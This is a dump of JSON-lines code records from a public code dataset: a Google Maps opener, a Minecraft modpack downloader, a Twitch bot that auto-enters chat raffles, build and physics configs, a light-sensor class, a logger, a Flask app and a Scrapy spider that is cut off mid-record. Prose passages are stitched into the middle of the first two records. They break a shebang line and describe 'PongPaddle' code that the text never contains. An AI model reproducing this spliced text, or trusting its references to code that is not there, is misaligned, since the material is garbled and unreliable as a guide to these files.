+{"seq_id":"453882854","text":"#! 
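The bounce in PongPaddle above flips the ball's x velocity, scales speed by 1.1, and bends y by how far from the paddle centre the ball hit. The same math without Kivy's Vector class, for inspection:

def bounce(vx, vy, ball_y, paddle_y, paddle_h):
    # -1 when the ball hits the paddle's bottom edge, +1 at the top
    offset = (ball_y - paddle_y) / (paddle_h / 2)
    return -vx * 1.1, vy * 1.1 + offset

print(bounce(4.0, 0.0, ball_y=120, paddle_y=100, paddle_h=100))
# (-4.4, 0.4): reversed, 10% faster, deflected upward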
python3\r\n\r\n#Gets a street address from the command line arguments or from clipboard.\r\n#Opens the web browser to the Google Maps page for the address.\r\n# How to run:\r\n# Copy address -> Win + R -> mapit (+ paste)\r\n\r\nimport webbrowser, sys, pyperclip\r\n\r\nif len(sys.argv) > 1:\r\n # Get the address from cmd line:\r\n address = ' '.join(sys.argv[1:])\r\nelse:\r\n # Get the address from clipboard\r\n address = pyperclip.paste()\r\n\r\n#open a web browser to:\r\nwebbrowser.open('https://www.google.com/maps/place/' + address)\r\n","sub_path":"mapit.py","file_name":"mapit.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421194512","text":"import json\nimport os\nimport shutil\nimport sys,collections\nimport zipfile,getpass\nimport webbrowser\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nfrom pathlib import Path\n\nclass modc:\n url = 'http://modc.wwsg18.com/'\n title = 'minecraft'\n author = 'modc'\n about = 'a minecraft game'\n version = '1.7.10'\n starter = 'HMCL-Win'\n mod = []\n map = []\n texture = []\n curdir = False\n\n def downGame(self):\n path = os.path.join(os.getcwd(),self.version + '.zip')\n download = 'https://wwsg18.cdn.bcebos.com/modc/game/' + self.version + '.zip'\n\n if not self.curdir:\n if os.path.exists(self.version):\n shutil.rmtree(self.version)\n\n if os.path.exists(self.title):\n shutil.rmtree(self.title)\n else:\n rootdir = os.getcwd()\n filelist=os.listdir(rootdir) \n for f in filelist:\n filepath = os.path.join( rootdir, f )\n if os.path.basename(filepath) != \"modc.json\":\n if os.path.isfile(filepath):\n os.remove(filepath)\n elif os.path.isdir(filepath):\n shutil.rmtree(filepath,True)\n\n status = self.download(download,path,'Game',self.version)\n\n if not status:\n print('游戏本体下载失败,程序自动退出....')\n exit()\n\n f = zipfile.ZipFile(self.version + '.zip')\n if self.curdir:\n zpath = ''\n else:\n zpath = self.title\n for file in f.namelist():\n extracted_path = Path(f.extract(file,zpath))\n try:\n extracted_path.rename(os.path.join(os.path.dirname(path),zpath,file).encode('cp437').decode('gbk'))\n except:\n extracted_path.rename(os.path.join(os.path.dirname(path),zpath,file).encode('cp437').decode('utf-8'))\n\n f.close()\n\n os.remove(self.version + '.zip')\n \n def downStarter(self):\n \n if self.curdir:\n path = os.path.join(os.getcwd(),self.starter + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,self.starter + '.zip')\n\n download = 'http://wwsg18.cdn.bcebos.com/modc/starter/' + self.starter +'.zip'\n\n status = self.download(download,path,'Starter',self.starter)\n\n if not status:\n return\n\n f = zipfile.ZipFile(path)\n for file in f.namelist():\n if self.curdir:\n extracted_path = Path(f.extract(file,''))\n else:\n extracted_path = Path(f.extract(file,os.path.dirname(path)))\n \n try:\n extracted_path.rename(os.path.join(os.path.dirname(path),file).encode('cp437').decode('gbk'))\n except:\n extracted_path.rename(os.path.join(os.path.dirname(path),file).encode('cp437').decode('utf-8'))\n\n f.close()\n os.remove(path)\n\n def downPkg(self):\n if self.mod:\n for mod in self.mod.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/mod/' + self.version + '/' + mod + '.jar'\n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/mods',mod + '.jar')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/mods',mod + '.jar')\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + mod + 
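The extraction loop in modc's downGame above undoes zip's filename mangling for archives built on Chinese-locale Windows: zipfile decodes non-UTF-8 entry names as cp437, so the code re-encodes to cp437 bytes and decodes as GBK, falling back to UTF-8. The decode step in isolation (fix_zip_name is an invented helper name):

def fix_zip_name(name):
    try:
        raw = name.encode("cp437")
    except UnicodeEncodeError:
        return name                 # already a proper unicode name
    try:
        return raw.decode("gbk")
    except UnicodeDecodeError:
        return raw.decode("utf-8")  # same fallback order as the loop above

mangled = bytes([0xD6, 0xD0, 0xCE, 0xC4]).decode("cp437")  # GBK bytes for 中文
print(fix_zip_name(mangled))  # 中文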
'&game=' + self.version)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Mod',mod)\n\n if not status:\n continue\n\n if self.map:\n for map in self.map.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/map/' + self.version + '/' + map + '.zip'\n\n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/saves',map + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/saves',map + '.zip')\n\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + map)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Map',map)\n\n if not status:\n continue\n\n f = zipfile.ZipFile(path)\n for file in f.namelist():\n f.extract(file, os.path.dirname(path))\n f.close()\n os.remove(path)\n\n if self.texture:\n for texture in self.texture.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/texture/' + self.version + '/' + texture + '.zip'\n \n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/resourcepacks',texture + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/resourcepacks',texture + '.zip')\n\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + texture)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Texture',texture)\n\n if not status:\n continue\n\n\n def download(self,url,path,type,val):\n print('开始下载: ' + type + '[' + val + \"]: \")\n try:\n urllib.request.urlretrieve(url, path, self.Schedule)\n except urllib.error.HTTPError:\n print(type + '[' + val + ']资源不存在...\\n')\n return False\n else:\n print('\\n')\n return True\n \n\n def Schedule(self,a,b,c):\n per = int(100.0 * a * b / c)\n if per > 100:\n per = 100\n self.viewBar(per,100)\n\n def viewBar(self,num, total):\n rate = num / total\n rate_num = int(rate * 100)\n r = '\\r[%s%s]' % (\">\" * num, \" \" * (100 - num))\n sys.stdout.write(r)\n sys.stdout.write(str(num) + '%')\n sys.stdout.flush()\n\ndef main():\n args = sys.argv\n if len(args) == 1:\n print('''\nUsage:\n modc <指令> [参数]\n \nCommands:\n init 初始化modc配置文件\n search 在modc搜索一个资源\n home 打开一个资源的主页\n install 安装一个游戏包\n add 增加资源到配置\n remove 删除资源从配置\n preload 自动加载前置模组\n download 下载一个现成的整合包\n recomm 随机推荐资源\n info 获取Modc信息\n ''')\n elif len(args) == 2 and args[1] == 'init':\n config_name_default = \"Minecraft\"\n config_author_default = getpass.getuser()\n config_about_default = \"这是一个我的世界整合包\"\n config_version_default = \"1.7.10\"\n config_starter_default = \"HMCL-Win\"\n config_curdir_default = False\n config_mods = {}\n config_maps = {}\n config_textures = {}\n\n print(\"所有选项的详情可以前往:http://bbs.wwsg18.com 查看:\")\n config_name = input(\"请输入游戏包名(整合包文件名) [默认: \" + config_name_default + \"]:\")\n config_author = input(\"请输入游戏包创建者(整合包创建者) [默认: \" + config_author_default + \"]:\")\n config_about = input(\"请输入游戏包介绍(简单的介绍整合包) [默认: \" + config_about_default + \"]:\")\n config_version = input(\"请输入游戏版本(支持版本请前往官网查看) [默认: \" + config_version_default + \"]:\")\n config_starter = input(\"请输入使用启动器(推荐HMCL,MultiMc) [默认: \" + config_starter_default + \"]:\")\n config_curdir = input(\"是否直接在当前目录下创建程序(输入True或False) [默认: False]:\")\n config_mod = input(\"设置要安装的mod(使用,分开) [默认: 空]:\")\n config_map = input(\"设置要安装的地图(使用,分开) [默认: 空]:\")\n config_texture = input(\"设置要安装的材质包(使用,分开) [默认: 空]:\")\n\n if config_name == \"\":\n config_name = config_name_default\n if config_author == \"\":\n config_author = config_author_default\n if config_about == \"\":\n config_about = config_about_default\n if config_version == 
\"\":\n config_version = config_version_default\n if config_starter == \"\":\n config_starter = config_starter_default\n if config_curdir != \"True\" and config_curdir != \"true\" and config_curdir != 'TRUE':\n config_curdir = config_curdir_default\n else:\n config_curdir = True\n if config_mod != \"\":\n config_mod_list = config_mod.split(',')\n for i in config_mod_list:\n config_mods[i] = \"*\"\n if config_map != \"\":\n config_map_list = config_mod.split(',')\n for i in config_map_list:\n config_maps[i] = \"*\"\n if config_texture != \"\":\n config_texture_list = config_mod.split(',')\n for i in config_texture_list:\n config_textures[i] = \"*\"\n\n file = open(os.path.join(os.getcwd(),'modc.json'),'w',encoding=\"utf-8\")\n config = collections.OrderedDict()\n \n config['title'] = config_name\n config['author'] = config_author\n config['about'] = config_about\n config['version'] = config_version\n config['starter'] = config_starter\n config['curdir'] = config_curdir\n config['mod'] = config_mods\n config['map'] = config_maps\n config['texture'] = config_textures\n\n\n\n file.write(json.dumps(config,sort_keys=False,indent=4,separators=(',', ':'),ensure_ascii=False))\n print(\"初始化完毕!请编辑 modc.json 来配置您的游戏....\")\n file.close()\n elif len(args) == 3 and args[1] == 'search':\n url = modc().url\n search = urllib.request.urlopen(url + 'api/search/package?service=search.package&word=' + urllib.parse.quote(args[2]))\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n msg = package['title'] + '/' + package['name'] + ': ' + package['about']\n print(msg)\n\n elif len(args) == 3 and args[1] == 'home':\n url = modc().url\n search = urllib.request.urlopen(url + 'api/search/package?service=search.package&word=' + urllib.parse.quote(args[2]))\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n msg = package['title'] + ':' + url + 'package/' + package['type'] + '/' + package['id']\n print(msg)\n\n elif len(args) == 4 and args[1] == 'add':\n file = open(os.path.join(os.getcwd(),'modc.json'),'r',encoding='UTF-8')\n config_old = file.read()\n file.close()\n config = collections.OrderedDict()\n config = json.loads(config_old,encoding='UTF-8')\n config[args[2]][args[3]] = '*'\n file = open(os.path.join(os.getcwd(),'modc.json'),'w',encoding='UTF-8')\n file.write(json.dumps(config,indent=4,separators=(',', ':'),ensure_ascii=False))\n file.close()\n print('增加 ' + args[2] + ': ' + args[3] + ' 成功!')\n elif len(args) == 4 and args[1] == 'remove':\n\n file = open(os.path.join(os.getcwd(), 'modc.json'), 'r',encoding='UTF-8')\n config_old = file.read()\n file.close()\n config = collections.OrderedDict()\n config = json.loads(config_old,encoding='UTF-8')\n if args[3] in config[args[2]]:\n config[args[2]].pop(args[3])\n file = open(os.path.join(os.getcwd(), 'modc.json'), 'w',encoding='UTF-8')\n file.write(json.dumps(config, indent=4, separators=(',', ':'),ensure_ascii=False))\n file.close()\n print('删除 ' + args[2] + ': ' + args[3] + ' 成功!')\n elif len(args) == 3 and args[1] == 'download':\n\n path = os.path.join(os.getcwd(),args[2] + '.zip')\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/game/' + args[2] + '.zip'\n\n modc().download(download,path,'Integrated',args[2])\n\n f = zipfile.ZipFile(args[2] + '.zip')\n for file in f.namelist():\n f.extract(file,'')\n f.close()\n os.remove(args[2] + '.zip')\n\n print(\"游戏整合包: [\" + args[2] + \"] 
下载成功!\")\n\n elif len(args) == 2 and args[1] == 'recomm':\n\n url = modc().url\n search = urllib.request.urlopen(url + 'api/recomm?service=recomm')\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n about = package['about']\n if len(about) > 42:\n about = about[0:42] + '...'\n msg = package['title'] + '/' + package['title'] + ' ' + about\n print(msg)\n elif len(args) == 2 and args[1] == 'preload':\n path = os.getcwd()\n \n if os.path.isfile(path + '/modc.json'):\n file = open(path + '/modc.json', 'r',encoding='UTF-8')\n config = file.read().encode(\"utf-8\")\n file.close()\n # json解析\n data_old = json.loads(config)\n data = json.loads(config)\n\n for mod in data_old['mod']:\n print(\"开始加载[\" + mod + \"]前置Mod....\")\n res = urllib.request.urlopen(\"http://api.wwsg18.com/public/?service=Modc.Data.GetData&Name=\" + mod)\n result = json.loads(res.read().decode('UTF-8'))\n\n if not 'Preposition' in result['data']:\n print('[' + mod + ']参数不存在....')\n continue\n\n pre = result['data']['Preposition']\n if pre == None:\n print('[' + mod + ']资源不存在....')\n continue\n\n if pre != \"\" and not pre.isspace():\n prelist = pre.split(',')\n for preo in prelist:\n data['mod'][preo] = '*'\n print(\"[\" + mod + \"]的前置mod: \" + preo + \" 加载成功!\")\n file = open(os.path.join(path,'modc.json'),'w',encoding='UTF-8')\n file.write(json.dumps(data,indent=4,separators=(',', ':'),ensure_ascii=False))\n file.close()\n else:\n print(\"[\" + mod + \"]无需加载任何前置....\")\n\n\n elif len(args) == 2 and args[1] == 'install':\n path = os.getcwd()\n\n if os.path.isfile(path + '/modc.json'):\n file = open(path + '/modc.json', 'r',encoding='UTF-8')\n config = file.read().encode(\"utf-8\")\n file.close()\n\n # json解析\n data = json.loads(config)\n\n # 处理json文件中的配置\n game = modc()\n if 'title' in data:\n game.title = data['title']\n if 'author' in data:\n game.author = data['author']\n if 'about' in data:\n game.about = data['about']\n if 'version' in data:\n game.version = data['version']\n if 'starter' in data:\n game.starter = data['starter']\n if 'curdir' in data:\n game.curdir = data['curdir']\n if 'mod' in data:\n game.mod = data['mod']\n if 'map' in data:\n game.map = data['map']\n if 'texture' in data:\n game.texture = data['texture']\n\n # 开始进行下载\n game.downGame()\n game.downStarter()\n game.downPkg()\n \n if not data['curdir']:\n shutil.copyfile('modc.json',os.path.join(os.getcwd(),data['title'],'modc.json'))\n\n print(\"游戏包已安装成功....\")\n elif len(args) == 2 and args[1] == 'info':\n info = \"\"\"\n--------------------- Modc Game Creater ---------------------\n软件名:Modc\n软件版本:Beta\n软件作者:mr小卓X(mrxzx@wwsg18.top)\n软件介绍:一款简单的整合包制作工具:可一键生成想要的整合包!\n编译信息:Python(Pyinstaller)\n官方网站:http://modc.wwsg18.com\n--------------------- Modc Game Creater ---------------------\n\"\"\"\n \n print(info)\n\n\nif __name__ == '__main__':\n main()","sub_path":"modc.py","file_name":"modc.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556425914","text":"#!/usr/bin/python3\n\nimport sys\nimport traceback\nimport socket\nimport string\nimport gi\nfrom time import sleep\n\ngi.require_version('Notify', '0.7')\nfrom gi.repository import Notify\n\ndef subtract_lists(a, b):\n \"\"\" Subtracts two lists. 
Throws ValueError if b contains items not in a \"\"\"\n # Terminate if b is empty, otherwise remove b[0] from a and recurse\n return a if len(b) == 0 else [a[:i] + subtract_lists(a[i+1:], b[1:]) \n for i in [a.index(b[0])]][0]\n\nclass twitch_irc:\n _connected = False\n _logged = False \n\n def __init__(self, key: string, percent=80): \n Notify.init('Twitch')\n self._socket = None\n self._authkey = key\n self._username = ''\n self._channel = ''\n self._messages = []\n self._percent = percent\n self._lastkey = ''\n self._notify = Notify.Notification.new(self._username, 'Initialized', 'information')\n if not key.startswith('oauth:'):\n self._authkey = 'oauth:' + self._authkey\n\n def __del__(self):\n self.logout()\n\n def start(self):\n while 1:\n try:\n data = self._socket.recv(1024).decode().split(' ')\n except UnicodeDecodeError:\n continue\n\n if len(data) == 0:\n continue\n\n if data[0] == 'PING':\n self._socket.sendall(bytes('PONG :tmi.twitch.tv\\r\\n', 'UTF-8'))\n continue\n\n if len(data) < 2:\n continue\n\n if data[1] == 'PRIVMSG':\n currentmessage = ' '.join(data[3:]).replace(':', '').replace('\\r\\n', '')\n \n if self._lastkey == currentmessage:\n continue\n\n self._messages.append(currentmessage)\n\n orig_length = len(self._messages)\n msg_set = set(self._messages)\n if len(msg_set) == 0:\n continue\n\n percent = abs(((len(msg_set) - orig_length) / orig_length) * 100)\n if percent > self._percent:\n try:\n diff_list = subtract_lists(self._messages, list(msg_set))\n except ValueError:\n continue\n\n self._lastkey = diff_list[int(len(diff_list) / 2)]\n\n self._notify.update('%s Raffle! - %s' % (self._channel, self._username),\n 'Current keyword: %s' % self._lastkey)\n self._notify.show()\n print('Key: %s'% self._lastkey)\n self.send_message(self._lastkey)\n del self._messages[:]\n continue \n\n if len(self._messages) == 100:\n del self._messages[:]\n \n raise Exception('Disconnected!')\n\n def login(self, login):\n self.logout()\n self._socket = socket.socket()\n self._socket.settimeout(30) \n self._socket.connect(('irc.chat.twitch.tv', 6667))\n self._connected = True\n self._socket.sendall(bytes('PASS %s\\r\\n' % self._authkey, 'UTF-8'))\n self._socket.sendall(bytes('NICK %s\\r\\n' % login.lower(), 'UTF-8'))\n self._socket.sendall(bytes('USER %s\\r\\n' % login.lower(), 'UTF-8'))\n self._logged = True\n self._username = login\n print('Connected!')\n\n def logout(self):\n if self.is_connected() or self.is_logged():\n self._socket.close()\n del self._socket\n self._connected = False\n self._logged = False\n\n def is_connected(self):\n return self._connected\n\n def is_logged(self):\n return self._logged\n\n def send_message(self, message):\n self._socket.send(bytes('PRIVMSG #%s :%s\\r\\n' % (self._channel, message), 'UTF-8'))\n\n def set_channel(self, channel_name, message=''):\n if self.is_logged():\n self._channel = channel_name.lower()\n self._socket.sendall(bytes('JOIN #%s\\r\\n' % self._channel, 'UTF-8'))\n if len(message) > 0:\n self.send_message(message)\n\n\ndef main(argv):\n if len(argv) < 4:\n print('script.py [message]')\n print('Example 1: \"script.py oauth:sad4as4d564as65d6a MyName ChannelMLG\"')\n print('Example 2: \"script.py oauth:sad4as4d564as65d6a MyName ChannelMLG Hello\"')\n print('Example 3: \"script.py sad4as4d564as65d6a MyName ChannelMLG\"')\n print('Example 4: \"script.py sad4as4d564as65d6a MyName ChannelMLG Hello\"')\n sys.exit(0)\n\n print('Using OAuth: \"%s\"' % argv[1])\n print('Username: \"%s\"' % argv[2])\n print('Channel: \"%s\"' % argv[3])\n if 
len(argv) >= 5:\n print('Message: \"%s\"' % ' '.join(argv[4:]))\n\n irc = twitch_irc(argv[1])\n\n while True:\n try:\n irc.login(argv[2])\n irc.set_channel(argv[3], ' '.join(argv[4:]) if len(argv) == 5 else '')\n irc.start()\n except socket.timeout:\n print('No response in %is! Reconecting...' % irc._socket.gettimeout())\n sleep(10)\n except socket.gaierror:\n print('No internet! Check your connection.')\n sleep(20)\n except KeyboardInterrupt:\n sys.exit()\n except:\n print('Exception in user code:')\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136223634","text":"import pathlib\n\nfrom pydo import *\n\nthis_dir = pathlib.Path(__file__).parent\n\npackage = {\n 'requires': ['net'],\n 'sysroot_debs': [],\n 'root_debs': ['wget', 'curl'],\n 'target': this_dir / 'balenamigration.tar.gz',\n 'install': ['{chroot} {stage} /bin/systemctl reenable balenamigration.service'],\n}\n\nstage = this_dir / 'stage'\nservice = this_dir / 'balenamigration.service'\nscriptmigration = this_dir / 'balenamigration.sh'\nscriptnettool = this_dir / 'nettool.sh'\n\n@command(produces=[package['target']], consumes=[service])\ndef build():\n call([\n f'rm -rf --one-file-system {stage}',\n\n f'mkdir -p {stage}/etc/systemd/system',\n f'mkdir -p {stage}/opt/balenamigration/',\n f'cp {service} {stage}/etc/systemd/system/',\n f'cp {scriptmigration} {stage}/opt/balenamigration/',\n f'cp {scriptnettool} {stage}/opt/balenamigration/',\n\n f'tar -C {stage} -czf {package[\"target\"]} .',\n ])\n\n\n@command()\ndef clean():\n call([\n f'rm -rf --one-file-system {stage} {package[\"target\"]}',\n ])\n","sub_path":"packages/balenamigration/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240622846","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process(\"TEST\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source (\"PoolSource\",\n fileNames=cms.untracked.vstring(\n \"root://xrootd.unl.edu//store/mc/Summer12_DR53X/TToLeptons_t-channel_8TeV-powheg-tauola/AODSIM/PU_S10_START53_V7A-v1/0000/0034258A-D7DE-E111-BEE3-00261834B529.root\"\n )\n)\n\nprocess.genParticleSelector = cms.EDProducer('GenParticleSelector',\n src=cms.InputTag(\"genParticles\")\n)\nprocess.hasGenLepton = cms.EDFilter(\n \"PATCandViewCountFilter\",\n src=cms.InputTag(\"genParticleSelector\", \"trueLepton\"),\n minNumber=cms.uint32(1),\n maxNumber=cms.uint32(1),\n)\nprocess.multiCosTheta=cms.EDProducer(\"MultiCosThetaProducer\",\n lqTopCosTheta=cms.PSet(\n restFrame=cms.InputTag(\"genParticleSelector\",\"trueTop\"),\n particles=cms.VInputTag(cms.InputTag(\"genParticleSelector\",\"trueLepton\"),cms.InputTag(\"genParticleSelector\",\"trueLightJet\"))\n ),\n wHelicityCosTheta=cms.PSet(\n restFrame=cms.InputTag(\"genParticleSelector\",\"trueWboson\"),\n particles=cms.VInputTag(cms.InputTag(\"genParticleSelector\",\"trueLepton\"),cms.InputTag(\"genParticleSelector\",\"trueTop\"))\n )\n)\n\nprocess.p0 = cms.Path(process.genParticleSelector*process.hasGenLepton*process.multiCosTheta)\n\nprocess.out= cms.OutputModule(\"PoolOutputModule\",\n splitLevel=cms.untracked.int32(99),\n 
fileName=cms.untracked.string(\"test.root\"),\n SelectEvents=cms.untracked.PSet(\n SelectEvents=cms.vstring('p0')\n )\n)\n\nprocess.outpath = cms.EndPath(process.out)\n","sub_path":"CMSSW/src/SingleTopPolarization/MultiCosThetaProducer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92612819","text":"#-*- coding: utf-8 -*-\r\nimport RPi.GPIO as GPIO\r\nimport time # used for sleep\r\n\r\nclass myLight:\r\n # pin 7 is used\r\n def __init__(self, pin):\r\n self.light_pin = pin\r\n GPIO.setwarnings(False)\r\n GPIO.setmode(GPIO.BOARD)\r\n\r\n\r\n def rc_time(self):\r\n count = 0\r\n\r\n # Drive the pin low briefly as an output to discharge the capacitor\r\n GPIO.setup(self.light_pin, GPIO.OUT) # set pin 7 as an output\r\n GPIO.output(self.light_pin, GPIO.LOW) # drive pin 7 low\r\n # any of these three forms works:\r\n # 1, GPIO.HIGH, True\r\n # 0, GPIO.LOW, False\r\n\r\n time.sleep(0.1) # 0.1 sec sleep\r\n\r\n # switch pin 7 to input\r\n GPIO.setup(self.light_pin, GPIO.IN)\r\n\r\n # count until the value read from pin 7 goes HIGH\r\n # so the darker the sensor's surroundings, the higher the count\r\n while (GPIO.input(self.light_pin) == GPIO.LOW):\r\n count += 1\r\n\r\n return count\r\n\r\n def CleanLight(self):\r\n GPIO.cleanup() # clean up every port that was used\r\n\r\n","sub_path":"light_sensor.py","file_name":"light_sensor.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616833325","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport logging\nimport os\n\nclass Logger(object):\n def __init__(self, logger):\n \n self.logger = logging.Logger(logger)\n self.logger.setLevel(logging.DEBUG)\n \n steamtime = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime())\n dir_name = os.path.dirname(os.path.abspath('.')) + '\\\\logs\\\\'\n os.makedirs(dir_name, exist_ok=True) # make sure the log directory exists\n filename = dir_name + steamtime + '.log'\n rh = logging.FileHandler(filename)\n rh.setLevel(logging.INFO)\n \n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n\n fmt = logging.Formatter('%(asctime)s %(filename)s[%(lineno)d] %(name)s %(levelname)s %(message)s')\n rh.setFormatter(fmt)\n sh.setFormatter(fmt)\n \n self.logger.addHandler(rh)\n self.logger.addHandler(sh)\n \n def getlog(self):\n \n return self.logger","sub_path":"interface/src/common_/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31441026","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, request\nimport os\n\n\ndef create_app(testing = False):\n\n \"\"\"app factory\"\"\"\n\n app = Flask(__name__)\n\n # app context manager\n app_ctx = app.app_context()\n app_ctx.push()\n\n app.config[\"SECRET_KEY\"] = \"Your-secret-key-here\"\n\n\n CWD = os.getcwd()\n\n BASIC_AUTH_SQLITE_DATABSE_URI = os.path.join(CWD, 'blueprints/auth/basic_auth/sqlite_db.db')\n app.config['BASIC_AUTH_SQLITE_DATABSE_URI'] = BASIC_AUTH_SQLITE_DATABSE_URI\n\n # debug mode on while testing the app or when in development mode\n if testing:\n app.debug = True\n\n\n # flask app routes\n \n @app.route(\"/\")\n # root route\n def index():\n \"\"\"Landing page of the app\"\"\"\n return render_template(\"index.html\")\n\n\n @app.route(\"/about\")\n # about page\n def about():\n \"\"\"about page of the app\"\"\"\n return render_template(\"about.html\")\n\n \n @app.route('/sitemap')\n # sitemap\n def routes():\n \"\"\"displays all the routes for the app\"\"\"\n routes = {}\n for rule in 
app.url_map.iter_rules():\n if rule.endpoint != \"static\":\n routes[rule.rule] = app.view_functions[rule.endpoint].__doc__\n endpoints = list(routes.keys())\n endpoints.sort()\n return render_template('routes.html', routes = routes, endpoints = endpoints)\n\n\n # registering blueprints\n\n #components blueprint\n from blueprints.components import componentsBP\n app.register_blueprint(componentsBP.bp)\n\n # authentication blueprint\n from blueprints.auth import authBP\n app.register_blueprint(authBP.bp)\n\n from blueprints.auth.basic_auth import sqlite_db\n sqlite_db.init_app(app)\n sqlite_db.init_db()\n \n\n return app\n\n\nif __name__ == \"__main__\":\n FLASK_APP = create_app(testing = True)\n FLASK_APP.run(port = 5000)","sub_path":"template/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637513762","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom parse_tools.parseTools import get_next_pages, get_urls, get_text, get_js_webpage\nfrom zhengce.items import failurl, zhengCe\nfrom datetime import datetime\n\nclass A44GuangdZcSpider(scrapy.Spider):\n name = '44_guangd_zc'\n allowed_domains = ['www.gd.gov.cn']\n start_urls = ['http://www.gd.gov.cn/zwgk/wjk/qbwj/index.html']\n\n def parse(self, response):\n \"\"\"\n 回调列表处理函数,处理起始页面的文章。获取总页数,拼接剩余页地址,回调列表处理函数处理剩余文章。\n :param response:\n :return:\n \"\"\"\n try:\n #处理首页\n yield response.follow(response.url, self.parse_list, meta={'a_websource': '广东'})\n #获取总页数,拼接其他页面地址,然后分页处理。\n page_count_strs = response.css('div.page a')\n for page_count_str in page_count_strs:\n s = page_count_str.css('a::text').extract_first().replace(' ','')\n if s.find('最后一页') != -1:\n tmps = page_count_str.css('a::attr(\"href\")').extract_first()\n page_count = int(tmps[tmps.find('index_')+6:tmps.find('.html')])\n root_url = response.url[:response.url.find('index')]\n middle_url = 'index_'\n last_url_tag = '.html'\n next_page_urls = get_next_pages(page_count-1, root_url, middle_url, last_url_tag, 2)\n for next_page_url in next_page_urls:\n yield response.follow(next_page_url, self.parse_list, meta={'a_websource': '广东'})\n except Exception as e:\n print(str(e))\n\n def parse_list(self, response):\n \"\"\"\n 找到网页中文章列表,并回调文章解析函数。\n :param response:\n :return:\n \"\"\"\n a_websource = response.meta[\"a_websource\"]\n try:\n a_urls_css = 'div.viewList li span'\n links = get_urls(a_urls_css, response)\n put_dates = response.css('div.viewList li span.time::text').extract()\n for link in links:\n yield response.follow(link.url, self.parse_artical,meta={'a_websource': a_websource, 'pub_date':put_dates[links.index(link)]})\n except Exception as e:\n print(str(e))\n\n def parse_artical(self,response):\n \"\"\"\n 处理文章内容,先获取表头政策描述信息,再解析下方正文信息。\n :param response:\n :return:\n \"\"\"\n furl = failurl()\n doc = zhengCe()\n doc['a_timestamp'] = datetime.now()\n\n try:\n doc[\"a_websource\"] = response.meta[\"a_websource\"]\n doc[\"a_url\"] = response.url\n doc[\"a_pub_time\"] = response.meta[\"pub_date\"]\n if len(get_text(response.css('div.classify div.row div.col').extract())[0]) == 0:\n res = get_js_webpage(response.url,delay=1)\n else:\n res = response\n metas = get_text(res.css('div.classify div.row div.col').extract())[0]\n if len(metas) != 0:\n meta_strs = res.css('div.classify div.row div.col')\n doc[\"a_pub_meta\"] = metas\n for meta in meta_strs:\n s = meta.css('label::text').extract_first().replace('\\xa0','')\n if 
